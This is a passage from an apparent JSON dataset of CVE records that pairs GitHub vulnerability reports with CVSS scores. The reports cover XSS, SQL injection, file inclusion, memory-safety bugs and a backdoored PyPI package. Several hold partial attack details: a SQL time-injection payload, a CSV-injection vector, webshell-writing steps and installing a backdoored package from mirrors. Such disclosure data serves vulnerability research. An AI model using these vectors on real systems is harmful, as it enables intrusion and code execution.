  81921. "description": "Sandbox breakout bug (details omitted). What happened? The details of this bug have been sent to MENTIONTAG by email on March NUMBERTAG This issue only serves to track the fixing process publicly. In short, I've found a bug in Sandboxie that presumably lets an attacker break out of the sandbox. This has yet to be confirmed by the developers, though. To Reproduce Described in the email. Expected behavior Sandboxed programs should not be allowed to escape. What is your Windows edition and version? Windows NUMBERTAG Home NUMBERTAG H2 APITAG NUMBERTAG bit In which Windows account you have this problem? A local or Microsoft account without special changes. Please mention any installed security software Built in realtime protection in Windows NUMBERTAG What version of Sandboxie are you running? Sandboxie Classic NUMBERTAG bit Is it a regression? _No response_ List of affected browsers _No response_ In which sandbox type you have this problem? I only reproduced it with Sandboxie Classic. Is the sandboxed program also installed outside the sandbox? No, it is not installed in the real system. Can you reproduce this problem on an empty sandbox? I can confirm it also on an empty sandbox. Did you previously enable some security policy settings outside Sandboxie? _No response_ Crash dump _No response_ Trace log _No response_ Sandboxie.ini configuration _No response_ Sandboxie Plus.ini configuration (for Plus interface issues) _No response_",
  81922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  81923. "severity": "HIGH",
  81924. "baseScore": 8.6,
  81925. "impactScore": 4.0,
  81926. "exploitabilityScore": 3.9
  81927. },
  81928. {
  81929. "CVE_ID": "CVE-2022-28074",
  81930. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1769",
  81931. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1769",
  81932. "Repo_new": "halo-dev/halo",
  81933. "Issue_Created_At": "2022-03-24T10:15:41Z",
  81934. "description": "\u4e00\u4e9b\u5b89\u5168\u5efa\u8bae\uff0c\u5efa\u8bae\u9690\u85cf. What is version of Halo has the issue NUMBERTAG What database are you using? Other What is your deployment method? Fat Jar Your site address. _No response_ What happened? \u4f5c\u8005\u4f60\u597d\uff0c\u5728\u90e8\u7f72\u73af\u5883\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u4e86\u4e00\u4e9b\u95ee\u9898\u3002 \u5e0c\u671b\u5728\u4e0b\u4e00\u4e2a\u7248\u672c\u4e2d\uff0c\u80fd\u591f\u8fdb\u884c\u4e00\u4e9b\u5b89\u5168\u7684\u5347\u7ea7\u3002 \u5982\u4e0b\uff1a \u5bfc\u51fa\u7684\u6587\u4ef6\u672a\u52a0\u5bc6\uff0c\u53ef\u4ee5\u4fee\u6539\u5185\u5bb9\uff0c\u5b89\u5168\u9690\u60a3\uff1a \u7528\u6237\u5c06\u535a\u5ba2\u5907\u4efd\u5f00\u6e90\u5230\u4e92\u8054\u7f51\uff0c\u906d\u5230\u4fee\u6539\uff0c\u53ef\u80fd\u5bfc\u81f4\u5b58\u50a8\u578bxss FILETAG FILETAG FILETAG json data \u672a\u52a0\u5bc6 \u4f4d\u7f6e\uff1ablog_footer_info \u53ef\u5bfc\u81f4\uff0c\u5176\u4ed6\u4f4d\u7f6e\u4e5f\u4e00\u6837 \u6548\u679c\u5982\u4e0b\uff1a FILETAG \u4fee\u590d\u5efa\u8bae\uff1a \u5bf9\u5907\u4efd\u5185\u5bb9\u8fdb\u884c\u52a0\u5bc6\u3002\u3002\u3002 \u540c\u6837\u7684xss\uff0c\u4e5f\u53ef\u4ee5\u5728\u8be5\u4f4d\u7f6e\u5f97\u5230\u8bc1\u5b9e URLTAG FILETAG FILETAG Relevant log output _No response_ Additional information English report\uff1a \u00b7 FILETAG when i clicked APITAG label\uff0cthe options will be save... URLTAG allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the APITAG label FILETAG NUMBERTAG stored cross site scripting (XSS) vulnerability in The Database Backup feature. FILETAG FILETAG when i clicked APITAG label\uff0cthe json data will be exported. FILETAG this json data allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into after the APITAG option FILETAG if someone import this json data. this payload will be executed FILETAG FILETAG",
  81935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  81936. "severity": "MEDIUM",
  81937. "baseScore": 4.8,
  81938. "impactScore": 2.7,
  81939. "exploitabilityScore": 1.7
  81940. },
  81941. {
  81942. "CVE_ID": "CVE-2022-28076",
  81943. "Issue_Url_old": "https://github.com/likCodinG/seacms_vul/issues/1",
  81944. "Issue_Url_new": "https://github.com/likcoding/seacms_vul/issues/1",
  81945. "Repo_new": "likCodinG/seacms_vul",
  81946. "Issue_Created_At": "2022-03-24T14:22:00Z",
  81947. "description": "seacms NUMBERTAG ulnerability Execution Command. APITAG in to the background, click System and then click Mail Server APITAG code in any box in the box below, take APITAG as an example, you need to write APITAG if you want to write a sentence Trojan, you can write ${ APITAG a])} (it can also be successfully connected after testing). APITAG APITAG refresh the page directly, or directly access PATHTAG in the root path APITAG APITAG",
  81948. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81949. "severity": "HIGH",
  81950. "baseScore": 7.2,
  81951. "impactScore": 5.9,
  81952. "exploitabilityScore": 1.2
  81953. },
  81954. {
  81955. "CVE_ID": "CVE-2022-28085",
  81956. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/480",
  81957. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/480",
  81958. "Repo_new": "michaelrsweet/htmldoc",
  81959. "Issue_Created_At": "2022-03-24T12:44:48Z",
  81960. "description": "APITAG heap buffer overflow in function pdf_write_names. Description Whilst experimenting with htmldoc , built from commit NUMBERTAG f NUMBERTAG URLTAG , we are able to induce a vulnerability in function APITAG , using a harness compiled from APITAG . Because there is no bounds checking, a heap based out of bound read will be triggered when the software encounters a malformed file, result in information disclosure or denial of service. Proof of Concept The POC is: poc_heap_overflow1 URLTAG The command is: `./htmldoc webpage t pdf f /dev/null poc_heap_overflow1 The ASAN report is: ERRORTAG Impact This vulnerability is capable of inducing information disclosure or denial of service.",
  81961. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81962. "severity": "HIGH",
  81963. "baseScore": 7.8,
  81964. "impactScore": 5.9,
  81965. "exploitabilityScore": 1.8
  81966. },
  81967. {
  81968. "CVE_ID": "CVE-2022-28096",
  81969. "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/39",
  81970. "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/39",
  81971. "Repo_new": "zorlan/skycaiji",
  81972. "Issue_Created_At": "2022-03-25T10:45:07Z",
  81973. "description": "Remote code execution vulnerability in PATHTAG Vulnerability conditions Website Admin permissions Vulnerability details Location: PATHTAG L NUMBERTAG APITAG Code: ERRORTAG Vulnerability key code: ERRORTAG",
  81974. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81975. "severity": "HIGH",
  81976. "baseScore": 7.2,
  81977. "impactScore": 5.9,
  81978. "exploitabilityScore": 1.2
  81979. },
  81980. {
  81981. "CVE_ID": "CVE-2022-28101",
  81982. "Issue_Url_old": "https://github.com/turtl/tracker/issues/404",
  81983. "Issue_Url_new": "https://github.com/turtl/tracker/issues/404",
  81984. "Repo_new": "turtl/tracker",
  81985. "Issue_Created_At": "2021-12-13T21:49:44Z",
  81986. "description": "Filter APITAG tags from notes. Notes allow APITAG tag injection. Ie, a note with the content APITAG opens a new browser window to Google. While this problem would happen over person to person sharing and thus the severity is limited (because you generally only share with those you trust) it remains high priority. Special thanks to Rafay Baloch and Muhammad Samak for this report.",
  81987. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  81988. "severity": "CRITICAL",
  81989. "baseScore": 9.0,
  81990. "impactScore": 6.0,
  81991. "exploitabilityScore": 2.3
  81992. },
  81993. {
  81994. "CVE_ID": "CVE-2022-28102",
  81995. "Issue_Url_old": "https://github.com/housamz/php-mysql-admin-panel-generator/issues/19",
  81996. "Issue_Url_new": "https://github.com/housamz/php-mysql-admin-panel-generator/issues/19",
  81997. "Repo_new": "housamz/php-mysql-admin-panel-generator",
  81998. "Issue_Created_At": "2022-03-25T20:50:21Z",
  81999. "description": "Cross Site Scripting (XSS) Security Issue . Affected software : php mysql admin panel generator Version : N/A Type of vulnerability : XSS APITAG Site Scripting) Author : s7safe Description: php mysql admin panel generator is susceptible to cross site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages . APITAG : login the system FILETAG turn to URLTAG APITAG APITAG Successful FILETAG Reason: Failure to filter or escape special characters leads to vulnerabilities How to fix : escape special characters or filter it . by s7safe",
  82000. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82001. "severity": "MEDIUM",
  82002. "baseScore": 5.4,
  82003. "impactScore": 2.7,
  82004. "exploitabilityScore": 2.3
  82005. },
  82006. {
  82007. "CVE_ID": "CVE-2022-28111",
  82008. "Issue_Url_old": "https://github.com/pagehelper/Mybatis-PageHelper/issues/674",
  82009. "Issue_Url_new": "https://github.com/pagehelper/mybatis-pagehelper/issues/674",
  82010. "Repo_new": "pagehelper/mybatis-pagehelper",
  82011. "Issue_Created_At": "2022-06-02T07:20:42Z",
  82012. "description": "\u5173\u4e8e CVETAG \u6f0f\u6d1e\uff0c\u4e0d\u8981\u5728\u53d1 issues \u4e86\uff01\uff01\uff01. APITAG \u5982\u679c\u4f60\u4ece\u524d\u7aef\u4f20\u9012\u4e00\u4e2a SQL \u7528 JDBC \u539f\u751f\u65b9\u5f0f\u6267\u884c\uff0c\u4f60\u662f\u4e0d\u662f\u53d1\u73b0\u4e86\u4e00\u4e2a\u5929\u5927\u7684\u6f0f\u6d1e\uff1f \u5982\u679cJDBC\u4e0d\u505a\u5904\u7406\uff0c\u662f\u4e0d\u662f\u5c31\u4e0d\u7528 JDBC \u4e86\uff1f \u5982\u679c\u8fd9\u4e2a\u6f0f\u6d1e\u4f1a\u5f71\u54cd\u4f60\u4eec\u9879\u76ee\u9009\u62e9\u5206\u9875\u63d2\u4ef6\uff0c\u53ef\u4ee5\u5728\u5f53\u524d issues \u7559\u8a00\uff0c\u5982\u679c\u7559\u8a00\u4eba\u6570\u5f88\u591a\uff0c\u4e0b\u4e2a\u7248\u672c\u53ef\u4ee5\u628a order by \u529f\u80fd\u53bb\u6389\u3002",
  82013. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82014. "severity": "CRITICAL",
  82015. "baseScore": 9.8,
  82016. "impactScore": 5.9,
  82017. "exploitabilityScore": 3.9
  82018. },
  82019. {
  82020. "CVE_ID": "CVE-2022-28118",
  82021. "Issue_Url_old": "https://github.com/siteserver/cms/issues/3386",
  82022. "Issue_Url_new": "https://github.com/siteserver/cms/issues/3386",
  82023. "Repo_new": "siteserver/cms",
  82024. "Issue_Created_At": "2022-05-02T12:48:09Z",
  82025. "description": "Plugin Vulnerability. The plugin function allows you to execute arbitrary code to obtain server permissions Detail: FILETAG The corresponding CVE number CVETAG has been applied It is hoped that corresponding restrictions can be carried out :)",
  82026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82027. "severity": "CRITICAL",
  82028. "baseScore": 9.8,
  82029. "impactScore": 5.9,
  82030. "exploitabilityScore": 3.9
  82031. },
  82032. {
  82033. "CVE_ID": "CVE-2022-28352",
  82034. "Issue_Url_old": "https://github.com/weechat/weechat/issues/1763",
  82035. "Issue_Url_new": "https://github.com/weechat/weechat/issues/1763",
  82036. "Repo_new": "weechat/weechat",
  82037. "Issue_Created_At": "2022-03-12T13:03:28Z",
  82038. "description": "Having to re set the APITAG env variable every single session.. Question Everytime I start a session of Weechat and attempt to connect to a server, if the APITAG config option has already been set to anything, or even nothing at all, and even when it ihas been correctly set to APITAG from previous sessions, I always encounter certificate issues with gnutils and thus TLS handshake will fail, disallowing me from making a secure connection to any server (non SSL connections still work, of course) ERRORTAG However , if I then proceed to APITAG to something else , and then after that, set it to the correct value with APITAG , Weechat will handle SSL certificates and connect just fine like it is supposed to. But when I quit and the next time I start Weechat, the same issue shows up again, and then I have to manually set that configuration to something else wrong on purpose, then set it back right again, even when it is already right! I have already tried to find a way to circumvent this issue by starting weechat with a new config APITAG , and even there, the same issue happens after I quit and restart. Right now, my only option to get around this issue is to probably use a script that can APITAG to something different each time I quit the client, and then set the weechat client to run the correct APITAG command option on startup. Still though, I'd rather seek help to see why exactly my APITAG is behaving this way. APITAG version NUMBERTAG OS, distribution and version: APITAG Linu NUMBERTAG",
  82039. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
  82040. "severity": "MEDIUM",
  82041. "baseScore": 4.8,
  82042. "impactScore": 2.5,
  82043. "exploitabilityScore": 2.2
  82044. },
  82045. {
  82046. "CVE_ID": "CVE-2022-28355",
  82047. "Issue_Url_old": "https://github.com/scala-js/scala-js/issues/4657",
  82048. "Issue_Url_new": "https://github.com/scala-js/scala-js/issues/4657",
  82049. "Repo_new": "scala-js/scala-js",
  82050. "Issue_Created_At": "2022-03-25T23:09:04Z",
  82051. "description": "FILETAG should not provide a cryptographically insecure APITAG implementation. I'm specifically thinking about this section of code: URLTAG The Java NUMBERTAG docs for APITAG state: > Static factory to retrieve a type NUMBERTAG pseudo randomly generated) UUID. The UUID is generated using a cryptographically strong pseudo random number generator. Furthermore, URLTAG states that: > Developers who have not been exposed to RFC NUMBERTAG might naturally opt to invent their own approaches to UUID generation, potentially using APITAG (in TIFU by using APITAG there's an in depth discussion of why a Cryptographically Secure Pseudo Random Number Generator (_CSPRNG_) should be used when generating UUIDs). It's unclear to me how a developer or cross compiling their library or application for Scala.js should become aware that in fact they cannot rely on APITAG for cryptographically strong UUIDs. This seems a lot like a CVE to me. See also discussion in URLTAG PS would be good to set up a security policy at URLTAG",
  82052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82053. "severity": "HIGH",
  82054. "baseScore": 7.5,
  82055. "impactScore": 3.6,
  82056. "exploitabilityScore": 3.9
  82057. },
  82058. {
  82059. "CVE_ID": "CVE-2022-28379",
  82060. "Issue_Url_old": "https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1950",
  82061. "Issue_Url_new": "https://github.com/nginxproxymanager/nginx-proxy-manager/issues/1950",
  82062. "Repo_new": "nginxproxymanager/nginx-proxy-manager",
  82063. "Issue_Created_At": "2022-03-24T14:14:30Z",
  82064. "description": "Stored XSS when deleting proxy host. Steps to reproduce NUMBERTAG Login as administrative user NUMBERTAG Create a new proxy host entry with the payload APITAG as domain NUMBERTAG Hit save NUMBERTAG Try to delete the newly added proxy host. XSS payload is executed. FILETAG FILETAG FILETAG Recommendation: Implementing input validation and/or ensuring output sanitization. Risk: Low risk since high privileges are required.",
  82065. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  82066. "severity": "MEDIUM",
  82067. "baseScore": 4.8,
  82068. "impactScore": 2.7,
  82069. "exploitabilityScore": 1.7
  82070. },
  82071. {
  82072. "CVE_ID": "CVE-2022-28448",
  82073. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6191",
  82074. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6191",
  82075. "Repo_new": "nopsolutions/nopcommerce",
  82076. "Issue_Created_At": "2022-03-19T09:32:47Z",
  82077. "description": "Stored XSS in customer name when customer accessed deny resource and redirect to login page. APITAG version NUMBERTAG Steps to reproduce the problem: FILETAG Inject javascript code to First name or Last name at Customer Info When customer accesses deny resources, for example /admin, server will redirect user to login page and show up notification: APITAG are already logged in as APITAG Name}. You may log in with another account.\". Customer Name is reflected in the response without HTML encoding, and cause XSS when APITAG is called. Note: If admin used Place order (impersonate) feature, customer will execute javascript under admin session.",
  82078. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82079. "severity": "MEDIUM",
  82080. "baseScore": 5.4,
  82081. "impactScore": 2.7,
  82082. "exploitabilityScore": 2.3
  82083. },
  82084. {
  82085. "CVE_ID": "CVE-2022-28449",
  82086. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6192",
  82087. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6192",
  82088. "Repo_new": "nopsolutions/nopcommerce",
  82089. "Issue_Created_At": "2022-03-20T08:35:25Z",
  82090. "description": "Unrestricted File Upload in Apply for vendor account feature. APITAG version NUMBERTAG Steps to reproduce the problem: At Apply for vendor account feature, customer could upload arbitrary file, for example file FILETAG and content of submitted form as below: ERRORTAG After admin see Vendor apply info by clicking Edit button , uploaded file will be generated and the final uploaded file has formatted PATHTAG FILETAG id parameter is NUMBERTAG digits number and it is auto increment, therefore it is easy to guess/bruteforce User Input APITAG will be filtered special character, therefore, I just put alphabet characters here to make output unchange Content Type is text/html => Content Type extension is html . One of my final uploaded file is FILETAG Impact: Unrestricted File Upload in Apply for vendor account feature leading to Stored XSS FILETAG",
  82091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82092. "severity": "MEDIUM",
  82093. "baseScore": 6.1,
  82094. "impactScore": 2.7,
  82095. "exploitabilityScore": 2.8
  82096. },
  82097. {
  82098. "CVE_ID": "CVE-2022-28450",
  82099. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6194",
  82100. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6194",
  82101. "Repo_new": "nopsolutions/nopcommerce",
  82102. "Issue_Created_At": "2022-03-20T12:30:36Z",
  82103. "description": "XSS issue in the APITAG parameter. APITAG version NUMBERTAG Description: A stored cross site scripting (XSS) vulnerability exists when creating a new post of APITAG version NUMBERTAG that allows a remote attacker to execute arbitrary APITAG code at client browser Steps to reproduce the problem: Step NUMBERTAG Create new topic or reply topic with injecting APITAG to APITAG parameter FILETAG Step2: Click a text APITAG at topic that created in step NUMBERTAG to trigger XSS FILETAG Let me know if you require additional information.",
  82104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82105. "severity": "MEDIUM",
  82106. "baseScore": 5.4,
  82107. "impactScore": 2.7,
  82108. "exploitabilityScore": 2.3
  82109. },
  82110. {
  82111. "CVE_ID": "CVE-2022-28451",
  82112. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6203",
  82113. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6203",
  82114. "Repo_new": "nopsolutions/nopcommerce",
  82115. "Issue_Created_At": "2022-03-28T08:57:13Z",
  82116. "description": "Possible issue with database backup filenames. APITAG version NUMBERTAG The Maintenance feature in APITAG version NUMBERTAG is vulnerable to path traversal, an user can send the wrong value of parameter APITAG when sending POST request manually",
  82117. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82118. "severity": "HIGH",
  82119. "baseScore": 7.5,
  82120. "impactScore": 3.6,
  82121. "exploitabilityScore": 3.9
  82122. },
  82123. {
  82124. "CVE_ID": "CVE-2022-28461",
  82125. "Issue_Url_old": "https://github.com/lanfei-4/mingyuefusu/issues/1",
  82126. "Issue_Url_new": "https://github.com/lanfei-4/mingyuefusu/issues/1",
  82127. "Repo_new": "lanfei-4/mingyuefusu",
  82128. "Issue_Created_At": "2022-03-28T03:32:02Z",
  82129. "description": "mingyuefusu library management system SQL Injection vulnerability in all version. login in system FILETAG Click the labeled position to capture data packets\u3001use sql time injection to Validation vulnerabilities FILETAG Verify SQL injection vulnerabilities using APITAG FILETAG Code analysis PATHTAG FILETAG PATHTAG The following code does not use APITAG FILETAG",
  82130. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82131. "severity": "CRITICAL",
  82132. "baseScore": 9.8,
  82133. "impactScore": 5.9,
  82134. "exploitabilityScore": 3.9
  82135. },
  82136. {
  82137. "CVE_ID": "CVE-2022-28462",
  82138. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/85",
  82139. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/85",
  82140. "Repo_new": "201206030/novel-plus",
  82141. "Issue_Created_At": "2022-04-04T03:01:19Z",
  82142. "description": "Arbitrary file reading vulnerability exists in the ve APITAG Vulnerable code: ERRORTAG NUMBERTAG alidation vulnerabilities FILETAG",
  82143. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82144. "severity": "HIGH",
  82145. "baseScore": 7.5,
  82146. "impactScore": 3.6,
  82147. "exploitabilityScore": 3.9
  82148. },
  82149. {
  82150. "CVE_ID": "CVE-2022-28463",
  82151. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/4988",
  82152. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/4988",
  82153. "Repo_new": "imagemagick/imagemagick",
  82154. "Issue_Created_At": "2022-03-25T05:27:23Z",
  82155. "description": "APITAG heap buffer overflow PATHTAG in APITAG APITAG version NUMBERTAG Operating system Linux Operating system, version and so on Linux d NUMBERTAG f NUMBERTAG ae NUMBERTAG generic APITAG Ubuntu SMP Tue Mar NUMBERTAG UTC NUMBERTAG APITAG Description Hello, We are currently working on fuzz testing feature, and we found a heap use after free on APITAG Steps to Reproduce \u279c oss fuzz git:(master) \u2717 python infra/helper.py reproduce imagemagick encoder_cin_fuzzer PATHTAG APITAG docker run rm privileged i v PATHTAG v PATHTAG t PATHTAG reproduce encoder_cin_fuzzer runs NUMBERTAG FUZZER=encoder_cin_fuzzer + shift + ' FILETAG",
  82156. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  82157. "severity": "HIGH",
  82158. "baseScore": 7.8,
  82159. "impactScore": 5.9,
  82160. "exploitabilityScore": 1.8
  82161. },
  82162. {
  82163. "CVE_ID": "CVE-2022-28470",
  82164. "Issue_Url_old": "https://github.com/joajfreitas/marcador/issues/5",
  82165. "Issue_Url_new": "https://github.com/joajfreitas/marcador/issues/5",
  82166. "Repo_new": "joajfreitas/marcador",
  82167. "Issue_Created_At": "2022-03-28T11:41:59Z",
  82168. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install marcador NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  82169. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82170. "severity": "CRITICAL",
  82171. "baseScore": 9.8,
  82172. "impactScore": 5.9,
  82173. "exploitabilityScore": 3.9
  82174. },
  82175. {
  82176. "CVE_ID": "CVE-2022-28471",
  82177. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/49",
  82178. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/49",
  82179. "Repo_new": "rockcarry/ffjpeg",
  82180. "Issue_Created_At": "2022-03-25T10:42:12Z",
  82181. "description": "Integer overflow in APITAG resulting in heap overflow in APITAG at APITAG version : master (commit caade NUMBERTAG URLTAG poc : poc URLTAG command : ./ffjpeg e $poc$ Here is the trace reported by ASAN: ERRORTAG This issue is the same as NUMBERTAG but the fix to it NUMBERTAG fa4cf8 URLTAG is not complete. An integer overflow is still possible in line NUMBERTAG In the example below, when APITAG , APITAG which bypasses the check in line NUMBERTAG This will lead to a heap buffer flow in APITAG as in the ASAN report above. URLTAG CODETAG",
  82182. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82183. "severity": "MEDIUM",
  82184. "baseScore": 6.5,
  82185. "impactScore": 3.6,
  82186. "exploitabilityScore": 2.8
  82187. },
  82188. {
  82189. "CVE_ID": "CVE-2022-28481",
  82190. "Issue_Url_old": "https://github.com/zvory/csv-safe/issues/7",
  82191. "Issue_Url_new": "https://github.com/zvory/csv-safe/issues/7",
  82192. "Repo_new": "zvory/csv-safe",
  82193. "Issue_Created_At": "2022-03-10T17:08:57Z",
  82194. "description": "More special characters needs to be filtered out for a better security . MENTIONTAG First of all, you have done an amazing job with this gem. It is suggested to filter out more special characters such as | and % Because the current gem could be bypassed with the use of such vector NUMBERTAG A NUMBERTAG cmd|' /C calc'!D2 in older versions. References: URLTAG URLTAG CVETAG",
  82195. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82196. "severity": "CRITICAL",
  82197. "baseScore": 9.8,
  82198. "impactScore": 5.9,
  82199. "exploitabilityScore": 3.9
  82200. },
  82201. {
  82202. "CVE_ID": "CVE-2022-28487",
  82203. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/723",
  82204. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/723",
  82205. "Repo_new": "appneta/tcpreplay",
  82206. "Issue_Created_At": "2022-03-28T20:35:50Z",
  82207. "description": "APITAG Format string vulnerability in APITAG function. Describe the bug Tcpreplay version NUMBERTAG contains a memory leakage flaw, CVETAG vulnerability in APITAG function. The highest threat from this vulnerability is to data confidentiality. The inputs required to exploit the vulnerability is unknown. URLTAG Additional context A patch was proposed in the following pull request: URLTAG",
  82208. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82209. "severity": "HIGH",
  82210. "baseScore": 7.5,
  82211. "impactScore": 3.6,
  82212. "exploitabilityScore": 3.9
  82213. },
  82214. {
  82215. "CVE_ID": "CVE-2022-28488",
  82216. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/29",
  82217. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/29",
  82218. "Repo_new": "marc-q/libwav",
  82219. "Issue_Created_At": "2022-03-27T22:15:14Z",
  82220. "description": "Use of uninitialized value in function wav_format_write in libwav.c. Describe the bug An unitialized variable is used in function wav_format_write. The highest threat from this vulnerability is to data confidentiality. The unitialized variable format is copied to the stream pointed by f variable, as illustrated below. URLTAG System info Ubuntu NUMBERTAG LTS, clang version NUMBERTAG latest commit APITAG Steps to reproduce the behavior compile the program with APITAG Run command: APITAG poc URLTAG Output ERRORTAG Note, wav_chunk_write function calls wav_format_write, where it's the bug at.",
  82221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  82222. "severity": "HIGH",
  82223. "baseScore": 7.5,
  82224. "impactScore": 3.6,
  82225. "exploitabilityScore": 3.9
  82226. },
  82227. {
  82228. "CVE_ID": "CVE-2022-28505",
  82229. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/33",
  82230. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/33",
  82231. "Repo_new": "jflyfox/jfinal_cms",
  82232. "Issue_Created_At": "2022-03-29T08:03:30Z",
  82233. "description": "SQL injection vulnerability exists in APITAG CMS NUMBERTAG SQL injection vulnerability exists in APITAG CMS NUMBERTAG Analysis The vulnerability appears in lines NUMBERTAG of the APITAG FILETAG Here call APITAG to query with the following statement: APITAG When the length of APITAG is not equal to NUMBERTAG go into the if branch and call the APITAG method to concatenate APITAG \uff1a FILETAG The SQL statement after concatenation is as follows: APITAG Moving on, the APITAG parameter is concatenated to the end of the SQL statement String APITAG = APITAG (); defines the source of the APITAG argument APITAG FILETAG APITAG FILETAG The APITAG parameter is the APITAG parameter passed from the front end So you can construct payload to exploit this vulnerability Exploit Maven Startup Environment Vulnerability address: PATHTAG FILETAG Injection parameters: APITAG payload\uff1a ) AND (SELECT NUMBERTAG FROM APITAG woqr FILETAG SQLMAP Injection\uff1a FILETAG",
  82234. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82235. "severity": "HIGH",
  82236. "baseScore": 7.2,
  82237. "impactScore": 5.9,
  82238. "exploitabilityScore": 1.2
  82239. },
  82240. {
  82241. "CVE_ID": "CVE-2022-28521",
  82242. "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/4",
  82243. "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/4",
  82244. "Repo_new": "jorycn/thinkphp-zcms",
  82245. "Issue_Created_At": "2022-03-30T04:11:36Z",
  82246. "description": "There is a file inclusion vulnerability here: APITAG Vulnerability PATHTAG The vulnerability code is as follows: You can see that the incoming file is directly included here, and the file is not filtered FILETAG Vulnerability to reproduce: APITAG create a FILETAG file in the root directory of the website\uff0cof course, this can be any file in the root directory of the website FILETAG APITAG code in the FILETAG file is as follows: FILETAG APITAG url: URLTAG \uff0cuse the post method to pass in $file and $config_array FILETAG APITAG can see that FILETAG is successfully generated in the root directory of the website FILETAG APITAG backdoor tool to connect FILETAG FILETAG Repair suggestion: APITAG incoming files to php suffix APITAG the incoming filename APITAG and filter the content of incoming files",
  82247. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82248. "severity": "CRITICAL",
  82249. "baseScore": 9.8,
  82250. "impactScore": 5.9,
  82251. "exploitabilityScore": 3.9
  82252. },
  82253. {
  82254. "CVE_ID": "CVE-2022-28522",
  82255. "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/5",
  82256. "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/5",
  82257. "Repo_new": "jorycn/thinkphp-zcms",
  82258. "Issue_Created_At": "2022-03-30T06:01:31Z",
